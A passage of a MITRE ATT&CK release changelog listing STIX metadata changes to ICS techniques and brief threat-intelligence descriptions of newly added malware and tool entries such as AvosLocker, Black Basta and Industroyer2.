(Citation: PLCgurus 2021) * Stop - The PLC and program is stopped, while in this mode, outputs are forced off. (Citation: Machine Information Systems 2007) * Reset - Conditions on the PLC are reset to their original states. Warm resets may retain some memory while cold resets will reset all I/O and data registers. (Citation: Machine Information Systems 2007) * Test / Monitor mode - Similar to run mode, I/O is processed, although this mode allows for monitoring, force set, resets, and more generally tuning or debugging of the system. Often monitor mode may be used as a trial for initialization. (Citation: Omron)
kill_chain_phases[0]['phase_name']collection-icscollection
x_mitre_attack_spec_version2.1.03.1.0

[T0817] Drive-by Compromise

Current version: 1.0

Details
values_changed
STIX FieldOld valueNew Value
modified2022-09-20 18:27:54.818000+00:002023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name']initial-access-icsinitial-access
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesFile: File Creation
x_mitre_data_sourcesNetwork Traffic: Network Traffic Content
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesNetwork Traffic: Network Traffic Content
x_mitre_data_sourcesFile: File Creation

[T0871] Execution through API

Current version: 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-09-27 15:32:03.427000+00:002023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name']execution-icsexecution

[T0819] Exploit Public-Facing Application

Current version: 1.0

Details
values_changed
STIX FieldOld valueNew Value
modified2022-09-19 14:21:18.045000+00:002023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name']initial-access-icsinitial-access

[T0820] Exploitation for Evasion

Current version: 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-09-30 15:28:37.716000+00:002023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name']evasion-icsevasion
x_mitre_attack_spec_version2.1.03.1.0

[T0866] Exploitation of Remote Services

Current version: 1.0

Details
values_changed
STIX FieldOld valueNew Value
modified2022-09-20 19:23:07.842000+00:002023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name']initial-access-icsinitial-access
kill_chain_phases[1]['phase_name']lateral-movement-icslateral-movement
x_mitre_data_sources[0]Network Traffic: Network Traffic ContentApplication Log: Application Log Content
x_mitre_data_sources[1]Application Log: Application Log ContentNetwork Traffic: Network Traffic Content

[T0823] Graphical User Interface

Current version: 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-09-30 15:02:29.881000+00:002023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name']execution-icsexecution
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesProcess: Process Creation
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesProcess: Process Creation

[T0891] Hardcoded Credentials

Current version: 1.0

Details
values_changed
STIX FieldOld valueNew Value
modified2022-09-29 20:54:56.812000+00:002023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name']lateral-movement-icslateral-movement
kill_chain_phases[1]['phase_name']persistence-icspersistence
x_mitre_data_sources[0]Network Traffic: Network Traffic ContentLogon Session: Logon Session Creation
x_mitre_data_sources[1]Logon Session: Logon Session CreationNetwork Traffic: Network Traffic Content

[T0877] I/O Image

Current version: 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-09-27 18:41:43.724000+00:002023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name']collection-icscollection
x_mitre_attack_spec_version2.1.03.1.0

[T0872] Indicator Removal on Host

Current version: 1.0

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-24 15:09:07.609000+00:002023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name']evasion-icsevasion
x_mitre_data_sources[0]File: File MetadataFile: File Modification
x_mitre_data_sources[1]Process: Process CreationWindows Registry: Windows Registry Key Deletion
x_mitre_data_sources[2]File: File ModificationFile: File Metadata
x_mitre_data_sources[3]Windows Registry: Windows Registry Key ModificationProcess: OS API Execution
x_mitre_data_sources[5]Command: Command ExecutionProcess: Process Creation
x_mitre_data_sources[6]Windows Registry: Windows Registry Key DeletionCommand: Command Execution
x_mitre_data_sources[7]Process: OS API ExecutionWindows Registry: Windows Registry Key Modification

[T0883] Internet Accessible Device

Current version: 1.0

Details
values_changed
STIX FieldOld valueNew Value
modified2022-09-19 14:34:43.060000+00:002023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name']initial-access-icsinitial-access
x_mitre_attack_spec_version2.1.03.1.0

[T0867] Lateral Tool Transfer

Current version: 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-09-27 17:39:15.755000+00:002023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name']lateral-movement-icslateral-movement
x_mitre_data_sources[0]Network Traffic: Network Traffic ContentFile: File Metadata
x_mitre_data_sources[1]Network Share: Network Share AccessNetwork Traffic: Network Traffic Flow
x_mitre_data_sources[2]Network Traffic: Network Traffic FlowFile: File Creation
x_mitre_data_sources[3]Command: Command ExecutionNetwork Traffic: Network Traffic Content
x_mitre_data_sources[4]File: File CreationProcess: Process Creation
x_mitre_data_sources[5]File: File MetadataCommand: Command Execution
x_mitre_data_sources[6]Process: Process CreationNetwork Share: Network Share Access

[T0826] Loss of Availability

Current version: 1.0

Details
values_changed
STIX FieldOld valueNew Value
modified2022-09-19 14:36:34.715000+00:002023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name']impact-icsimpact

[T0827] Loss of Control

Current version: 1.0

Details
values_changed
STIX FieldOld valueNew Value
modified2022-09-19 14:38:06.130000+00:002023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name']impact-icsimpact

[T0828] Loss of Productivity and Revenue

Current version: 1.0

Details
values_changed
STIX FieldOld valueNew Value
modified2022-09-20 19:31:11.106000+00:002023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name']impact-icsimpact

[T0837] Loss of Protection

Current version: 1.0

Details
values_changed
STIX FieldOld valueNew Value
modified2022-09-19 14:40:19.570000+00:002023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name']impact-icsimpact

[T0880] Loss of Safety

Current version: 1.0

Details
values_changed
STIX FieldOld valueNew Value
modified2022-09-19 14:41:41.466000+00:002023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name']impact-icsimpact

[T0829] Loss of View

Current version: 1.0

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-24 15:09:07.609000+00:002023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name']impact-icsimpact

[T0831] Manipulation of Control

Current version: 1.0

Details
values_changed
STIX FieldOld valueNew Value
modified2022-05-24 14:57:44.326000+00:002023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name']impact-icsimpact

[T0832] Manipulation of View

Current version: 1.0

Details
values_changed
STIX FieldOld valueNew Value
modified2022-09-20 19:30:22.792000+00:002023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name']impact-icsimpact

[T0849] Masquerading

Current version: 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-09-27 16:56:31.022000+00:002023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name']evasion-icsevasion
x_mitre_data_sources[1]Command: Command ExecutionScheduled Job: Scheduled Job Modification
x_mitre_data_sources[2]Service: Service ModificationFile: File Metadata
x_mitre_data_sources[3]Service: Service CreationProcess: Process Metadata
x_mitre_data_sources[4]File: File ModificationService: Service Modification
x_mitre_data_sources[5]Process: Process MetadataFile: File Modification
x_mitre_data_sources[6]File: File MetadataCommand: Command Execution
x_mitre_data_sources[7]Scheduled Job: Scheduled Job ModificationService: Service Creation

[T0821] Modify Controller Tasking

Current version: 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-09-27 15:49:27.003000+00:002023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name']execution-icsexecution
x_mitre_data_sources[1]Operational Databases: Device AlarmApplication Log: Application Log Content
x_mitre_data_sources[2]Application Log: Application Log ContentOperational Databases: Device Alarm

[T0889] Modify Program

Current version: 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-09-27 16:08:15.574000+00:002023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name']persistence-icspersistence
x_mitre_data_sources[2]Asset: SoftwareOperational Databases: Device Alarm
x_mitre_data_sources[3]Operational Databases: Device AlarmAsset: Software

[T0839] Module Firmware

Current version: 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-09-26 18:41:49.037000+00:002023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name']persistence-icspersistence
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_data_sources[2]Application Log: Application Log ContentFirmware: Firmware Modification
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesApplication Log: Application Log Content
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesFirmware: Firmware Modification

[T0801] Monitor Process State

Current version: 1.0

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-24 15:09:07.609000+00:002023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name']collection-icscollection
x_mitre_data_sources[0]Application Log: Application Log ContentNetwork Traffic: Network Traffic Content
x_mitre_data_sources[1]Network Traffic: Network Traffic ContentApplication Log: Application Log Content

[T0834] Native API

Current version: 1.0

Details
values_changed
STIX FieldOld valueNew Value
modified2022-09-19 14:52:28.584000+00:002023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name']execution-icsexecution

[T0840] Network Connection Enumeration

Current version: 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-09-27 17:22:27.357000+00:002023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name']discovery-icsdiscovery
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_data_sources[1]Script: Script ExecutionCommand: Command Execution
x_mitre_data_sources[3]Command: Command ExecutionScript: Script Execution

[T0842] Network Sniffing

Current version: 1.0

Details
values_changed
STIX FieldOld valueNew Value
modified2022-09-20 19:22:11.937000+00:002023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name']discovery-icsdiscovery
x_mitre_data_sources[0]Command: Command ExecutionProcess: Process Creation
x_mitre_data_sources[1]Process: Process CreationCommand: Command Execution

[T0861] Point & Tag Identification

Current version: 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-09-26 15:24:07.480000+00:002023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name']collection-icscollection
x_mitre_data_sources[0]Network Traffic: Network Traffic ContentApplication Log: Application Log Content
x_mitre_data_sources[1]Application Log: Application Log ContentNetwork Traffic: Network Traffic Content

[T0843] Program Download

Current version: 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-09-26 16:25:38.670000+00:002023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name']lateral-movement-icslateral-movement
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_data_sources[1]Operational Databases: Device AlarmAsset: Asset Inventory
x_mitre_data_sources[3]Asset: Asset InventoryOperational Databases: Device Alarm

[T0845] Program Upload

Current version: 1.0

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-24 15:09:07.609000+00:002023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name']collection-icscollection
x_mitre_data_sources[1]Network Traffic: Network Traffic FlowNetwork Traffic: Network Traffic Content
x_mitre_data_sources[2]Network Traffic: Network Traffic ContentNetwork Traffic: Network Traffic Flow

[T0873] Project File Infection

Current version: 1.0

Details
values_changed
STIX FieldOld valueNew Value
modified2022-09-20 18:37:59.276000+00:002023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name']persistence-icspersistence

[T0886] Remote Services

Current version: 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-09-30 15:01:43.553000+00:002023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name']initial-access-icsinitial-access
kill_chain_phases[1]['phase_name']lateral-movement-icslateral-movement
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_data_sources[0]Process: Process CreationModule: Module Load
x_mitre_data_sources[1]Network Traffic: Network Connection CreationProcess: Process Creation
x_mitre_data_sources[2]Module: Module LoadNetwork Share: Network Share Access
x_mitre_data_sources[3]Network Share: Network Share AccessNetwork Traffic: Network Traffic Flow
x_mitre_data_sources[6]Network Traffic: Network Traffic FlowNetwork Traffic: Network Connection Creation

[T0846] Remote System Discovery

Current version: 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-09-30 15:34:29.457000+00:002023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name']discovery-icsdiscovery
x_mitre_data_sources[0]Network Traffic: Network Traffic ContentNetwork Traffic: Network Traffic Flow
x_mitre_data_sources[1]File: File AccessNetwork Traffic: Network Traffic Content
x_mitre_data_sources[3]Network Traffic: Network Traffic FlowFile: File Access

[T0888] Remote System Information Discovery

Current version: 1.1


Old Description
New Description
t1An adversary may attempt to get detailed information about rt1An adversary may attempt to get detailed information about r
>emote systems and their peripherals, such as make/model, rol>emote systems and their peripherals, such as make/model, rol
>e, and configuration. Adversaries may use information from R>e, and configuration. Adversaries may use information from R
>emote System Information Discovery to aid in targeting and s>emote System Information Discovery to aid in targeting and s
>haping follow-on behaviors. For example, the systems operati>haping follow-on behaviors. For example, the system's operat
>onal role and model information can dictate whether it is a >ional role and model information can dictate whether it is a
>relevant target for the adversary's operational objectives. > relevant target for the adversary's operational objectives.
>In addition, the systems configuration may be used to scope > In addition, the system's configuration may be used to scop
>subsequent technique usage.   Requests for system informatio>e subsequent technique usage.   Requests for system informat
>n are typically implemented using automation and management >ion are typically implemented using automation and managemen
>protocols and are often automatically requested by vendor so>t protocols and are often automatically requested by vendor 
>ftware during normal operation. This information may be used>software during normal operation. This information may be us
> to tailor management actions, such as program download and >ed to tailor management actions, such as program download an
>system or module firmware. An adversary may leverage this sa>d system or module firmware. An adversary may leverage this 
>me information by issuing calls directly to the systems API.>same information by issuing calls directly to the system's A
 >PI.
Details
values_changed
STIX FieldOld valueNew Value
modified2022-09-26 14:40:01.435000+00:002023-03-17 15:14:31.276000+00:00
descriptionAn adversary may attempt to get detailed information about remote systems and their peripherals, such as make/model, role, and configuration. Adversaries may use information from Remote System Information Discovery to aid in targeting and shaping follow-on behaviors. For example, the systems operational role and model information can dictate whether it is a relevant target for the adversary's operational objectives. In addition, the systems configuration may be used to scope subsequent technique usage. Requests for system information are typically implemented using automation and management protocols and are often automatically requested by vendor software during normal operation. This information may be used to tailor management actions, such as program download and system or module firmware. An adversary may leverage this same information by issuing calls directly to the systems API.An adversary may attempt to get detailed information about remote systems and their peripherals, such as make/model, role, and configuration. Adversaries may use information from Remote System Information Discovery to aid in targeting and shaping follow-on behaviors. For example, the system's operational role and model information can dictate whether it is a relevant target for the adversary's operational objectives. In addition, the system's configuration may be used to scope subsequent technique usage. Requests for system information are typically implemented using automation and management protocols and are often automatically requested by vendor software during normal operation. This information may be used to tailor management actions, such as program download and system or module firmware. An adversary may leverage this same information by issuing calls directly to the system's API.
kill_chain_phases[0]['phase_name']discovery-icsdiscovery
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_data_sources[0]Network Traffic: Network Traffic ContentFile: File Access
x_mitre_data_sources[3]File: File AccessNetwork Traffic: Network Traffic Content

[T0847] Replication Through Removable Media

Current version: 1.0

Details
values_changed
STIX FieldOld valueNew Value
modified2022-09-20 19:18:25.490000+00:002023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name']initial-access-icsinitial-access
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesProcess: Process Creation
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesProcess: Process Creation

[T0851] Rootkit

Current version: 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-20 20:44:34.980000+00:002023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name']evasion-icsevasion
x_mitre_attack_spec_version2.1.03.1.0

[T0852] Screen Capture

Current version: 1.0

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-24 15:09:07.609000+00:002023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name']collection-icscollection

[T0853] Scripting

Current version: 1.0

Details
values_changed
STIX FieldOld valueNew Value
modified2022-09-20 18:18:34.807000+00:002023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name']execution-icsexecution
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesScript: Script Execution
x_mitre_data_sourcesProcess: Process Creation
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesProcess: Process Creation
x_mitre_data_sourcesScript: Script Execution

[T0865] Spearphishing Attachment

Current version: 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-09-27 15:22:37.964000+00:002023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name']initial-access-icsinitial-access
x_mitre_attack_spec_version2.1.03.1.0
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesNetwork Traffic: Network Traffic Content
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesNetwork Traffic: Network Traffic Content

[T0869] Standard Application Layer Protocol

Current version: 1.0

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-24 15:09:07.609000+00:002023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name']command-and-control-icscommand-and-control
x_mitre_data_sources[0]Network Traffic: Network Traffic ContentNetwork Traffic: Network Traffic Flow
x_mitre_data_sources[1]Network Traffic: Network Traffic FlowNetwork Traffic: Network Traffic Content

[T0862] Supply Chain Compromise

Current version: 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-09-27 15:25:50.699000+00:002023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name']initial-access-icsinitial-access

[T0857] System Firmware

Current version: 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-09-26 17:14:52.590000+00:002023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name']persistence-icspersistence
x_mitre_data_sources[0]Network Traffic: Network Traffic ContentApplication Log: Application Log Content
x_mitre_data_sources[1]Firmware: Firmware ModificationOperational Databases: Device Alarm
x_mitre_data_sources[2]Application Log: Application Log ContentNetwork Traffic: Network Traffic Content
x_mitre_data_sources[3]Operational Databases: Device AlarmFirmware: Firmware Modification

[T0882] Theft of Operational Information

Current version: 1.0

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-24 15:09:07.609000+00:002023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name']impact-icsimpact

[T0863] User Execution

Current version: 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-09-27 16:03:41.333000+00:002023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name']execution-icsexecution
x_mitre_data_sources[0]Network Traffic: Network Traffic ContentApplication Log: Application Log Content
x_mitre_data_sources[1]Command: Command ExecutionFile: File Access
x_mitre_data_sources[2]Application Log: Application Log ContentProcess: Process Creation
x_mitre_data_sources[4]Process: Process CreationCommand: Command Execution
x_mitre_data_sources[5]File: File AccessNetwork Traffic: Network Traffic Content

[T0859] Valid Accounts

Current version: 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-09-27 16:35:12.478000+00:002023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name']persistence-icspersistence
kill_chain_phases[1]['phase_name']lateral-movement-icslateral-movement
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesLogon Session: Logon Session Metadata
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesLogon Session: Logon Session Metadata

[T0887] Wireless Sniffing

Current version: 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-09-27 17:37:02.773000+00:002023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name']discovery-icsdiscovery
kill_chain_phases[1]['phase_name']collection-icscollection

Software

enterprise-attack

New Software

[S1053] AvosLocker

Current version: 1.0

Description: [AvosLocker](https://attack.mitre.org/software/S1053) is ransomware written in C++ that has been offered via the Ransomware-as-a-Service (RaaS) model. It was first observed in June 2021 and has been used against financial services, critical manufacturing, government facilities, and other critical infrastructure sectors in the United States. As of March 2022, [AvosLocker](https://attack.mitre.org/software/S1053) had also been used against organizations in Belgium, Canada, China, Germany, Saudi Arabia, Spain, Syria, Taiwan, Turkey, the United Arab Emirates, and the United Kingdom.(Citation: Malwarebytes AvosLocker Jul 2021)(Citation: Trend Micro AvosLocker Apr 2022)(Citation: Joint CSA AvosLocker Mar 2022)


[S1070] Black Basta

Current version: 1.0

Description: [Black Basta](https://attack.mitre.org/software/S1070) is ransomware written in C++ that has been offered within the ransomware-as-a-service (RaaS) model since at least April 2022; there are variants that target Windows and VMWare ESXi servers. [Black Basta](https://attack.mitre.org/software/S1070) operations have included the double extortion technique where in addition to demanding ransom for decrypting the files of targeted organizations the cyber actors also threaten to post sensitive information to a leak site if the ransom is not paid. [Black Basta](https://attack.mitre.org/software/S1070) affiliates have targeted multiple high-value organizations, with the largest number of victims based in the U.S. Based on similarities in TTPs, leak sites, payment sites, and negotiation tactics, security researchers assess the [Black Basta](https://attack.mitre.org/software/S1070) RaaS operators could include current or former members of the [Conti](https://attack.mitre.org/software/S0575) group.(Citation: Palo Alto Networks Black Basta August 2022)(Citation: Deep Instinct Black Basta August 2022)(Citation: Minerva Labs Black Basta May 2022)(Citation: Avertium Black Basta June 2022)(Citation: NCC Group Black Basta June 2022)(Citation: Cyble Black Basta May 2022)


[S1068] BlackCat

Current version: 1.0

Description: [BlackCat](https://attack.mitre.org/software/S1068) is ransomware written in Rust that has been offered via the Ransomware-as-a-Service (RaaS) model. First observed November 2021, [BlackCat](https://attack.mitre.org/software/S1068) has been used to target multiple sectors and organizations in various countries and regions in Africa, the Americas, Asia, Australia, and Europe.(Citation: Microsoft BlackCat Jun 2022)(Citation: Sophos BlackCat Jul 2022)(Citation: ACSC BlackCat Apr 2022)


[S1063] Brute Ratel C4

Current version: 1.0

Description: [Brute Ratel C4](https://attack.mitre.org/software/S1063) is a commercial red-teaming and adversarial attack simulation tool that first appeared in December 2020. [Brute Ratel C4](https://attack.mitre.org/software/S1063) was specifically designed to avoid detection by endpoint detection and response (EDR) and antivirus (AV) capabilities, and deploys agents called badgers to enable arbitrary command execution for lateral movement, privilege escalation, and persistence. In September 2022, a cracked version of [Brute Ratel C4](https://attack.mitre.org/software/S1063) was leaked in the cybercriminal underground, leading to its use by threat actors.(Citation: Dark Vortex Brute Ratel C4)(Citation: Palo Alto Brute Ratel July 2022)(Citation: MDSec Brute Ratel August 2022)(Citation: SANS Brute Ratel October 2022)(Citation: Trend Micro Black Basta October 2022)


[S1052] DEADEYE

Current version: 1.0

Description: [DEADEYE](https://attack.mitre.org/software/S1052) is a malware launcher that has been used by [APT41](https://attack.mitre.org/groups/G0096) since at least May 2021. [DEADEYE](https://attack.mitre.org/software/S1052) has variants that can either embed a payload inside a compiled binary (DEADEYE.EMBED) or append it to the end of a file (DEADEYE.APPEND).(Citation: Mandiant APT41)


[S1066] DarkTortilla

Current version: 1.0

Description: [DarkTortilla](https://attack.mitre.org/software/S1066) is a highly configurable .NET-based crypter that has been possibly active since at least August 2015. [DarkTortilla](https://attack.mitre.org/software/S1066) has been used to deliver popular information stealers, RATs, and payloads such as [Agent Tesla](https://attack.mitre.org/software/S0331), AsyncRat, [NanoCore](https://attack.mitre.org/software/S0336), RedLine, [Cobalt Strike](https://attack.mitre.org/software/S0154), and Metasploit.(Citation: Secureworks DarkTortilla Aug 2022)


[S1072] Industroyer2

Current version: 1.0

Description: [Industroyer2](https://attack.mitre.org/software/S1072) is a compiled and static piece of malware that has the ability to communicate over the IEC-104 protocol. It is similar to the IEC-104 module found in [Industroyer](https://attack.mitre.org/software/S0604). Security researchers assess that [Industroyer2](https://attack.mitre.org/software/S1072) was designed to cause impact to high-voltage electrical substations. The initial [Industroyer2](https://attack.mitre.org/software/S1072) sample was compiled on 03/23/2022 and scheduled to execute on 04/08/2022, however it was discovered before deploying, resulting in no impact.(Citation: Industroyer2 Blackhat ESET)


[S1051] KEYPLUG

Current version: 1.0

Description: [KEYPLUG](https://attack.mitre.org/software/S1051) is a modular backdoor written in C++, with Windows and Linux variants, that has been used by [APT41](https://attack.mitre.org/groups/G0096) since at least June 2021.(Citation: Mandiant APT41)


[S1060] Mafalda

Current version: 1.0

Description: [Mafalda](https://attack.mitre.org/software/S1060) is a flexible interactive implant that has been used by [Metador](https://attack.mitre.org/groups/G1013). Security researchers assess the [Mafalda](https://attack.mitre.org/software/S1060) name may be inspired by an Argentinian cartoon character that has been popular as a means of political commentary since the 1960s. (Citation: SentinelLabs Metador Sept 2022)


[S1058] Prestige

Current version: 1.0

Description: [Prestige](https://attack.mitre.org/software/S1058) ransomware has been used by [Sandworm Team](https://attack.mitre.org/groups/G0034) since at least March 2022, including against transportation and related logistics industries in Ukraine and Poland in October 2022.(Citation: Microsoft Prestige ransomware October 2022)


[S1073] Royal

Current version: 1.0

Description: [Royal](https://attack.mitre.org/software/S1073) is ransomware that first appeared in early 2022; a version that also targets ESXi servers was later observed in February 2023. [Royal](https://attack.mitre.org/software/S1073) employs partial encryption and multiple threads to evade detection and speed encryption. [Royal](https://attack.mitre.org/software/S1073) has been used in attacks against multiple industries worldwide--including critical infrastructure. Security researchers have identified similarities in the encryption routines and TTPs used in [Royal](https://attack.mitre.org/software/S1073) and [Conti](https://attack.mitre.org/software/S0575) attacks and noted a possible connection between their operators.(Citation: Microsoft Royal ransomware November 2022)(Citation: Cybereason Royal December 2022)(Citation: Kroll Royal Deep Dive February 2023)(Citation: Trend Micro Royal Linux ESXi February 2023)(Citation: CISA Royal AA23-061A March 2023)


[S1071] Rubeus

Current version: 1.0

Description: [Rubeus](https://attack.mitre.org/software/S1071) is a C# toolset designed for raw Kerberos interaction that has been used since at least 2020, including in ransomware operations.(Citation: GitHub Rubeus March 2023)(Citation: FireEye KEGTAP SINGLEMALT October 2020)(Citation: DFIR Ryuk's Return October 2020)(Citation: DFIR Ryuk 2 Hour Speed Run November 2020)


[S1064] SVCReady

Current version: 1.0

Description: [SVCReady](https://attack.mitre.org/software/S1064) is a loader that has been used since at least April 2022 in malicious spam campaigns. Security researchers have noted overlaps between [TA551](https://attack.mitre.org/groups/G0127) activity and [SVCReady](https://attack.mitre.org/software/S1064) distribution, including similarities in file names, lure images, and identical grammatical errors.(Citation: HP SVCReady Jun 2022)


[S1065] Woody RAT

Current version: 1.0

Description: [Woody RAT](https://attack.mitre.org/software/S1065) is a remote access trojan (RAT) that has been used since at least August 2021 against Russian organizations.(Citation: MalwareBytes WoodyRAT Aug 2022)


[S1059] metaMain

Current version: 1.0

Description: [metaMain](https://attack.mitre.org/software/S1059) is a backdoor used by [Metador](https://attack.mitre.org/groups/G1013) to maintain long-term access to compromised machines; it has also been used to decrypt [Mafalda](https://attack.mitre.org/software/S1060) into memory.(Citation: SentinelLabs Metador Sept 2022)(Citation: SentinelLabs Metador Technical Appendix Sept 2022)

Minor Version Changes

[S0677] AADInternals

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX FieldOld valueNew Value
modified2022-08-03 15:01:46.965000+00:002023-04-15 00:59:18.335000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.11.2

[S0552] AdFind

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX FieldOld valueNew Value
modified2022-09-29 20:40:24.739000+00:002023-03-02 20:44:17.690000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.11.2

[S0373] Astaroth

Current version: 2.1

Version changed from: 2.0 → 2.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-12-08 21:14:48.861000+00:002023-03-21 21:20:23.717000+00:00
external_references[2]['source_name']Cybereason Astaroth Feb 2019Cofense Astaroth Sept 2018
external_references[2]['description']Salem, E. (2019, February 13). ASTAROTH MALWARE USES LEGITIMATE OS AND ANTIVIRUS PROCESSES TO STEAL PASSWORDS AND PERSONAL DATA. Retrieved April 17, 2019.Doaty, J., Garrett, P.. (2018, September 10). We’re Seeing a Resurgence of the Demonic Astaroth WMIC Trojan. Retrieved April 17, 2019.
external_references[2]['url']https://www.cybereason.com/blog/information-stealing-malware-targeting-brazil-full-researchhttps://cofense.com/seeing-resurgence-demonic-astaroth-wmic-trojan/
external_references[3]['source_name']Cofense Astaroth Sept 2018Securelist Brazilian Banking Malware July 2020
external_references[3]['description']Doaty, J., Garrett, P.. (2018, September 10). We’re Seeing a Resurgence of the Demonic Astaroth WMIC Trojan. Retrieved April 17, 2019.GReAT. (2020, July 14). The Tetrade: Brazilian banking malware goes global. Retrieved November 9, 2020.
external_references[3]['url']https://cofense.com/seeing-resurgence-demonic-astaroth-wmic-trojan/https://securelist.com/the-tetrade-brazilian-banking-malware/97779/
external_references[4]['source_name']Securelist Brazilian Banking Malware July 2020Cybereason Astaroth Feb 2019
external_references[4]['description']GReAT. (2020, July 14). The Tetrade: Brazilian banking malware goes global. Retrieved November 9, 2020.Salem, E. (2019, February 13). ASTAROTH MALWARE USES LEGITIMATE OS AND ANTIVIRUS PROCESSES TO STEAL PASSWORDS AND PERSONAL DATA. Retrieved April 17, 2019.
external_references[4]['url']https://securelist.com/the-tetrade-brazilian-banking-malware/97779/https://www.cybereason.com/blog/information-stealing-malware-targeting-brazil-full-research
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version2.02.1

[S0475] BackConfig

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
